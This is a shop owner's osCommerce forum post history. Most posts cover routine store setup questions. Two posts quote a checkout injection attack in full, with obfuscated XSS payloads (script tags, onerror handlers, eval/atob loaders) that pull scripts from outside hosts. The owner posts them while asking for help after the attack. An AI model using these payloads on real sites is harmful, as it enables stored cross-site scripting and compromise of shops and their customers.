Jump to content
Latest News: (loading..)

puggybelle

Members
  • Content count

    1,037
  • Joined

  • Last visited

Everything posted by puggybelle

  1. puggybelle

    Hack attempt - is there a way to prevent this?

    Okay, here's where I'm at. Webhost scanned the database and found three similar patterns of jb.gy in the sessions table and removed them. No new files had been added to the website. And just encouragement to upgrade my installation to the 'frozen' version, I think it's called. And that's what I thought I had! Oh, well. Work to do but it didn't turn out to be a disaster. Think I will give View Counter another look, though... If I have to block half the world, I'll do it! Thanks everybody! - Andrea
  2. Someone put an item in their cart and went thru Purchase Without Account and filled out their address details like this (or I assume they entered this manually): Bob Smith"__sCRiPt sRC=//jb.gy/i__/sC 244 Whatever St"__sCRiPt sRC=//jb.gy/i__/sCrIpT_ Ithaca Ithaca, New York 98765 United States I've changed the name and address for this post as the street address, city, state and zip code they provided is legit. They checked out using the Checks/Money Order method - no account was created or ever existed for this buyer's name. The order process email it generated bounced back to me as undeliverable: A message that you sent contained one or more recipient addresses that were incorrectly constructed: "Bob Smith"__sCRiPt sRC=//jb.gy/i__/sC" <bobsmith987@hotmail.com>: unmatched doublequote in local part (expected word or "<") This address has been ignored. There were no other addresses in your message, and so no attempt at delivery was possible. Is there a way to prevent that? Stop someone from proceeding when adding garbage in the name and address fields? And...can someone tell me what it is they're trying to accomplish by doing this? Thanks! - Andrea
  3. puggybelle

    Hack attempt - is there a way to prevent this?

    They checked out using the checks/money order selection so no worries about payment or delivery. And I sincerely hope that this is a one-off thing and all will be well. I have contacted my webhost with full details and am awaiting a response now. Other orders have come thru fine, so I'm hopeful that deleting the order is the end of it. This crap is really scary, you know? Well, I'm sure the webhost knows more than I do about these things, so...I've put it all in their lap now. I haven't the faintest idea how to go about manually cleaning the database. Hopefully, they'll find nothing and I can forget about it. My host does NOT offer country blocking. I had View Counter installed for a brief time, back when I had SEO-G urls running, but there was some conflict and I ended up uninstalling View Counter. In retrospect, it should have been the other way around. I now use Ultimate SEO URLs. Live and learn, I guess. I'll post back with any response I get from the webhost. Hopefully, everything is okay. Thanks all! - Andrea
  4. puggybelle

    Hack attempt - is there a way to prevent this?

    @ArtcoInc Well, this is just a mess! My core code has been modified substantially, so...I have a lot to think about now. But, Thank You for helping! @Jack_mcs Upon viewing the order process email that bounced back after this hack attempt, I see a huge chunk of malicious code that was inserted in the text section of the order form. The part where buyers can add any additional comments with their purchase. But, the < > tags have been stripped. Looks like this: _/tExtArEa_'"__sCRiPt sRC=//jb.gy/i__/sCrIpT__img src=x onerror=s=createElement('script');body.appendChild(s);s.src='//jb.gy/i';_ _/tEXtArEa_'"__img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fjb.gy%2Fi%22%2BMath.random%28%29%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//_'"__input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbGQ4Lm1lL3VwZUMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus_'"__img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbGQ4Lm1lL3VwZUMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))_ It'd be nice if we could get a hacker up here to explain what the heck they're doing or what they're after with code like that. I bet someone in this forum knows... I will take comfort in knowing that the code is being sanitized and just leave it at that. This hacker nonsense is crazy and worse then ever. Thanks to everyone who posted - I appreciate it very much! - Andrea
  5. puggybelle

    Hack attempt - is there a way to prevent this?

    Is there anything I need to do? When I run Version Checker in Admin, it comes back with: - Andrea
  6. puggybelle

    Hack attempt - is there a way to prevent this?

    @ArtcoInc I downloaded a package that is dated May 24, 2018 called Responsive - osCommerce - master - Andrea
  7. puggybelle

    Hack attempt - is there a way to prevent this?

    I always forget to say which version I'm using. I'm using 2.3.4.1 CE with the latest version of PWA. - Andrea
  8. puggybelle

    Hack attempt - is there a way to prevent this?

    Can you be a little more specific? I deleted the order - no account existed. I found some interesting info online when searching a bit deeper. The name has been reported numerous times from other websites seeing injection code in the name and address fields, and some ending up on the receiving end of credit card fraud. Google the phrase Linda Juan Fraud and see what comes up. Guess it was just my turn! Hope they send cash... - Andrea
  9. Function keys section at the bottom of Includes > Modules > Content > Product_Info > cm_pi_date_available.php is missing an entry for Available Style in the Date Available module. 'MODULE_CONTENT_PI_DATE_AVAILABLE_STYLE',
  10. Stumbled on a file that appears to be missing a line of code. Catalog > Includes > Modules > Content > Product_Info > cm_pi_date_available.php Bottom of the file reads: function keys() { return array('MODULE_CONTENT_PI_DATE_AVAILABLE_STATUS', 'MODULE_CONTENT_PI_DATE_AVAILABLE_CONTENT_WIDTH', 'MODULE_CONTENT_PI_DATE_AVAILABLE_SORT_ORDER'); It's missing the entry for Available Style, which controls the appearance of the date format. Should look like this: function keys() { return array('MODULE_CONTENT_PI_DATE_AVAILABLE_STATUS', 'MODULE_CONTENT_PI_DATE_AVAILABLE_CONTENT_WIDTH', 'MODULE_CONTENT_PI_DATE_AVAILABLE_STYLE', 'MODULE_CONTENT_PI_DATE_AVAILABLE_SORT_ORDER'); I stumbled on it after trying to figure out how to change the date format that was being output on my products. I don't know who is responsible for maintaining the downloads of osCommerce, but I thought I should pass this on so it can be corrected. Makes life a little easier when setting up the module. - Andrea
  11. Hi Zahid, Should I just provide a link to the thread I created above or write a brand new post in that one? Looks like it's still active, last post dated November 29th. - Andrea
  12. I've searched for help with this and saw several people asking for help with it over the years, but no replies. At present, if I put an item on sale...only the sale price will appear in the New Products module on the homepage. I'd like it to appear as it does in the Specials box....original price, with a strike thru it, followed by the new sale price in red. Tried several things in includes/modules/products_new.php but nothing I do is working out. Can someone point me in the right direction, please? - Andrea
  13. Sorry...make that includes/modules/new_products.php - Andrea
  14. @Jack_mcs I'm sorry. This is what happens when posting late at night. I have a question about the Reset SEO URLs Cache feature. Is that something that should be done every so often or only when you have a problem? I remember installing this and some things were not working and when I did that, it cleared up all of my trouble immediately. Should I use that feature on a regular basis or let it sit? Thank You! - Andrea
  15. @Jack_mcs I don't believe there was a wonky character in the title. All of my titles are the same, in the way they're formatted. Just numbers and text. I'm going to hope that it was one of those crap moments I experienced with my webhost until they put me on a different server when I raised hell. My item descriptions that I migrated over from 2.2 were loaded with css code that was killing the extra description from appearing when browsing by category. I've been manually editing and stripping that code for a couple of months now, one item at a time in Admin. Got thru 100 or so today. It's ongoing. I'm clicking around fast and furious and I haven't run into it again, so...I just have to hope it was one of those abrupt disconnects in the past that may have somehow whacked that item. I'll never know and that blows. Hope I don't see anymore of it. Thanks for the explanation of the uninstall. I took that entry literally...like, UNINSTALL. WIPE IT OUT. And start over if you wish to have it. Oh, well. It's a great tool and I'm glad to have it! - Andrea
  16. @ArtcoInc No, nothing unusual. Looked like all my others. No funky characters or anything. I think you know my site...all of my titles are formatted the same. Date-name-keywords Like...11-4-18-Name-Of-Product-Keyword-Keyword-p-4545.html Something got corrupted, but I definitely didn't see anything wrong with the product in the database. And I stared at it more than a few times. I'm just glad I stumbled upon it. I clicked on the item just to retrieve the large photo (right click/save) for something else and that's when I discovered it wouldn't load. Otherwise, it would be sitting out there like that...Product Not Found!...for eternity. My fear is...are there more? With thousands of products there's no way I can just sit here and click thru them all to make sure they load. I had some issues with my webhost in recent months and I'm wondering if one of those sudden MySQL disconnects during editing may have done me in on that particular item. I just don't know. I have no memory or having problems with that item at any time. I have had the experience of suffering a disconnect during editing and watching an item disappear. Only the image remains. The description and title vanish. But, this one is really strange as it looked fine in both Admin and the database. Nothing missing. Nothing changed. And it wouldn't let me duplicate the product name after deleting the original. I think that's just bizarre. - Andrea
  17. @Jack_mcs Cache is set to false. I have no idea what may have happened. Item looks fine in the database. I deleted the item and created it anew...with the same product title, same everything...but generating a new product ID number on the end... And it STILL wouldn't load! Product Not Found! I deleted it again...changed the product title to something else...and now it loads. Very bizarre. Out of curiosity, what happens when you choose the Uninstall option in the SEO config page in Admin? Or I guess I should ask...what do you have to do afterward to get it back? I was too timid to try it. - Andrea
  18. 2.3.4.1 CE and PHP 7.0 I installed this contribution in late September and had no issues that I'm aware of until now. I've stumbled upon a product that has a valid SEO url when moused over, like... mysite.com/name-of-product-p-4245.html When I click on it, the URL in the browser loads as mysite.com/-p-0.html And I get D'oh. Product Not Found! The item looks fine in the database in both the Products and Products Description tables. It looks fine in the Admin side where I create and maintain items. The only thing I can think of is that the item was turned off from view when I put it up for auction, but it will not load after turning it back on. Any idea what could be happening? I've reset the SEO URLS cache hoping that might clear it up, but no luck. - Andrea
  19. Version 2.3.4.1 CE I am using the Bootstrap Container (as opposed to container-fluid) as I like the way it centers the website onscreen, rather than have it full screen. Trying to figure out why my footer is extending the full-width of the screen. Looks like this: So, aside from a color entry, I added a couple of lines in my user.css regarding height and margin, like this: .footer-extra { background-color: #2e4963; color: #ffffff; height: 60px; margin: 0px 46px 25px 46px; } Now my footer looks a whole lot better, lining up with the rest of the page, except for these annoying little gray lines (borders?) that are appearing outside the footer as my scribbled arrows indicate: I'm guessing it has something to do with the containers but, I don't know how to fix that or where to look. I'd like to clean that up. Thanks for any help! - Andrea
  20. Thank You @Tsimi I tried border: 0px and had no luck. This makes me think twice about abandoning my navigation bar...same problem. Thanks! You make everything so easy! - Andrea
  21. Hello! I am using 2.3.4.1 CE I would like to have the My Account link always appear at the end of the breadcrumb. I see some code at the bottom of includes/application_top.php where I have added the My Account link: $breadcrumb->add(HEADER_TITLE_TOP, HTTP_SERVER); $breadcrumb->add(HEADER_TITLE_CATALOG, tep_href_link('index.php')); $breadcrumb->add(HEADER_TITLE_MY_ACCOUNT, tep_href_link('account.php')); So my breadcrumb now looks like this: How do I get My Account to always appear on the other end circled in blue, where it doesn't interfere with the breadcrumb being generated when browsing? Thanks! - Andrea
  22. Forgot to thank someone. @JcMagpie Putting this in a module is a great idea. It looks super nice! Very clean and linear. Like it belongs there. Thank You! - Andrea
  23. @MrPhil and Malcolm (your username won't come up when trying to insert it...?) Both of your solutions work. Thank You so much! I understand your point. I guess I'm trying to figure out a way to address all users, without turning off those who don't want to create an account. I have Purchase Without Account installed, so the idea of having Log On or Log In seems to imply you need an account. Don't want that. At the same time, if the link changes from My Account to Log Off...that kills the logged in users' avenue to view their account. The goal here is to get rid of the navigation bar and/or the Buttons module which have links for My Account. Free up some space in my header. I suppose the ideal solution would be to have My Account...buyer clicks and logs in...and now the module shows My Account | Log Off links. Then they log off and we're back to displaying My Account only. Do you know how to accomplish that? I can play with HTML code, but this PHP code is...difficult. For me! - Andrea
  24. This is what I tried... <div class="col-sm-<?php echo $content_width; ?> cm-header-breadcrumb2"> <ol class="breadcrumb" id=abc> if ( tep_session_is_registered('customer_id') ) { <li><a href="logoff.php">Log Off</a></li> } else { <li><a href="account.php">My Account</a></li></ol>} </div> And this is what I get... Now you know what I mean about code bleeding on the screen. ??? - Andrea
  25. Well, I'm happy to report that I did duplicate the module correctly the first time...yay!...just got stuck on how to edit the template file. I applied your code in the new template file and it works great! Just one issue I need to sort out. I'm trying to figure out how to apply a statement that controls what link appears in the module...either My Account or Log Off I think having a Log Off link is necessary and, theoretically, that should replace the My Account link after a customer has logged in. When they log off, My Account should reappear. I've messed around with some 'else' statements but all of my code just bleeds onto the screen. I need something like: if ( tep_session_is_registered('customer_id') ) { then Log Off appears in the module, otherwise My Account appears instead You get the idea. At the moment, all I can come up with is both links in the module, like this: Which looks dumb if you're not logged in. Funny enough, the Log Off link works whether you're logged in or not, but...it's not good having them both there. Can you help me with that? Thank You! - Andrea
×